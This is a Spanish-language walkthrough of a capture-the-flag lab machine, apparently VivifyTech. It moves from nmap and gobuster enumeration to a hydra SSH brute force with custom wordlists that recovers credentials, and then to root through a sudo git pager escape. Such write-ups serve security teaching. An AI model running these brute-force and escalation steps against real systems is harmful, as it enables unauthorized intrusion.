Empezamos con un escaneo general y uno específico de puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.27
❯ nmap -sC -sV -p22,80,3306,33060 -oN 02-targeted.txt 192.168.1.27
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-04 14:57 -03
Nmap scan report for 192.168.1.27
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_ 256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.88 secondsEl sitio muestra la página por defecto de Apache, pero con gobuster descubrimos una instalación de WordPress:
❯ gobuster dir -u 192.168.1.27 -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x html,php,txt
...
/index.html (Status: 200) [Size: 10701]
/wordpress (Status: 301) [Size: 316] [--> http://192.168.1.27/wordpress/]
...
❯ gobuster dir -u 192.168.1.27/wordpress -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt
...
/wp-content (Status: 301) [Size: 327] [--> http://192.168.1.27/wordpress/wp-content/]
/index.php (Status: 301) [Size: 0] [--> http://192.168.1.27/wordpress/]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 328] [--> http://192.168.1.27/wordpress/wp-includes/]
/wp-login.php (Status: 200) [Size: 5367]
/readme.html (Status: 200) [Size: 7399]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 325] [--> http://192.168.1.27/wordpress/wp-admin/]
/wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.1.27/wordpress/wp-login.php?action=register]
...En wp-includes hay un .txt con un diccionario, y navegando el sitio encontramos un post que nombra a varios empleados (incluido el CEO). Combinamos ambos para generar wordlists de usuarios y contraseñas, y hacemos fuerza bruta contra SSH con hydra:
❯ hydra -L users.txt -P secrets.txt 192.168.1.27 ssh -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-04 16:55:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 528 login tries (l:11/p:48), ~9 tries per task
[DATA] attacking ssh://192.168.1.27:22/
[STATUS] 521.00 tries/min, 521 tries in 00:01h, 49 to do in 00:01h, 22 active
[22][ssh] host: 192.168.1.27 login: sarah password: bohicon
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-04 16:56:24Accedemos con sarah:bohicon y obtenemos la primera flag. En su directorio hay un archivo con las credenciales del usuario gbodja. Con esa sesión continuamos la escalada con sudo -l:
gbodja@VivifyTech:~$ sudo -l
Matching Defaults entries for gbodja on VivifyTech:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_pty
User gbodja may run the following commands on VivifyTech:
(ALL) NOPASSWD: /usr/bin/gitPodemos ejecutar git como cualquier usuario. Según GTFOBins, abusamos del pager de git help (tipo less) para escapar a una shell:
❯ sudo git -p help configDentro del pager escribimos !/bin/bash y obtenemos acceso root. Capturamos la flag.
Fin.